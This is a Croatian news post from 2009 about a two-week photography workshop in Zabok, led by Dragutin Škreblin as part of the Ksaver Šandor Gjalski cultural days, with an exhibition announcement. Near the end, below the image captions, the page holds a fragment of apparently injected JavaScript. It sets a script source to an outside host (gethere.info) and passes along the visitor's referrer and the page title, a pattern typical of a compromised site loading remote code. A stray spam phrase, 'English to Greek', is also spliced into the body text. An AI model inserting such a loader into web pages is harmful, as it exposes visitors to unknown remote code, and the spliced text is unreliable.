Novosti i najave

Foto radionica “Od camere obscure do Photoshopa”

Znate li da je fotografija, pored nizanja redaka beletrističke proze, bila druga velika ljubav našeg gredičkog gospodina, Ksavera Šandora Gjalskog? Iz tog je razloga kao jedna od uvodnih aktivnosti u kulturnu manifestaciju Dani Ksavera Šandora Gjalskog održana foto radionica u režiji najpoznatijeg zabočkog majstora fotografskog zanata, Dragutina Škreblina.

Preko dvadeset sudionika dva se tjedna okupljalo u prostorima zabočke gimnazije Antuna Gustava Matoša. U prvim minutama radionice Škreblin je zaintrigirao polaznike pokazavši im „cameru obscuru“, preteču svakog fotoaparata, koju je izradio od obične kartonske kutije. U slijedećim danima Škreblin je objašnjavao pojmove poput blende, fokusa i ekspozicije, pravila zlatne sredine i pravila trećine jer je njihovo poznavanje nužan preduvjet da bi se snimila kvalitetna fotografija. English to Greek Vrlo je važno poznavati princip aditivnog miješanja boja, a korisno je vladati i osnovama obrade fotografije na računalu. I dok su neki u praktičnom dijelu radionice načinili svoje prve fotografske korake, neki su jednostavno „brusili“ fotografske vještine. Svaki klik fotoaparata budnim okom je pratio voditelj radionice i njegova supruga Sandra, a poseban gost bio je još jedan profesionalac, fotograf Davor Šarić. Što su sve objektivima svojih fotoaparata „ulovili“ polaznici radionice možete pogledati 20. listopada od 17 sati u zabočkoj gimnaziji.


thumbs-fotoradionica-04


thumbs-fotoradionica-04


thumbs-fotoradionica-04
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Dodano:
18. 12. 2009. u 16:14

Autor:
Neven Miškulin